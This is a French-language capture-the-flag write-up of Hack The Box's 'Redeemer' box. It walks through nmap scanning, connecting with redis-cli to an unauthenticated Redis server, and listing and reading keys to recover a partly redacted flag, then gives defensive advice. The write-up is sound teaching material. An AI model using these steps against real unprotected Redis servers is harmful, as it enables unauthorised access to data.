Redeemer
Redeemer est la quatrième box du parcours Starting Point de Hack The Box. Après avoir exploré Telnet, FTP et SMB, on s'attaque ici à un service de base de données très populaire : Redis.
Dans ce writeup, je ne publie pas directement le flag final, l'objectif est d'apprendre en pratiquant.
N'attaquez que des machines sur lesquelles vous avez l'autorisation. Respectez les règles de la plateforme.
Vidéo Walkthrough
Reconnaissance
Découverte d'hôte
┌─[user@parrot]─[~]
└──╼ $ping 10.129.2.212
64 bytes from 10.129.2.212: icmp_seq=1 ttl=63 time=14.5 ms
Énumération des services
Le scan classique ne trouve rien sur les 1000 ports par défaut — on scanne tous les ports.
┌─[user@parrot]─[~]
└──╼ $nmap -p- -sV 10.129.2.212
PORT STATE SERVICE VERSION
6379/tcp open redis Redis key-value store 5.0.7
Port 6379 : c'est Redis (version 5.0.7). Redis est un système de stockage clé-valeur en mémoire, souvent utilisé comme base de données ultra-rapide ou cache.
Pré-Exploitation
Evaluation de vulnérabilité
sudo apt install redis-tools
┌─[user@parrot]─[~]
└──╼ $redis-cli -h 10.129.2.212
10.129.2.212:6379>
On a un prompt sans aucune authentification. Faille critique de configuration.
Exploitation
Exploration de la base de données
10.129.2.212:6379> info
# Keyspace
db0:keys=4,expires=0,avg_ttl=0
La base db0 contient 4 clés. On liste toutes les clés.
10.129.2.212:6379> select 0
OK
10.129.2.212:6379> keys *
1) "temp"
2) "numb"
3) "flag"
4) "stor"
Une clé nommée flag — on récupère sa valeur.
10.129.2.212:6379> get flag
"03e{...}3eb"
La machine est pwned !
Post-Exploitation
Redis est extrêmement puissant mais ne possède pas de couche de sécurité robuste par défaut s'il est exposé sur le réseau sans mot de passe. Toujours vérifier que vos bases de données ne sont pas accessibles publiquement sans authentification.
Script bash de récupération automatique : MohamedOutougane/Redeemer_Automated
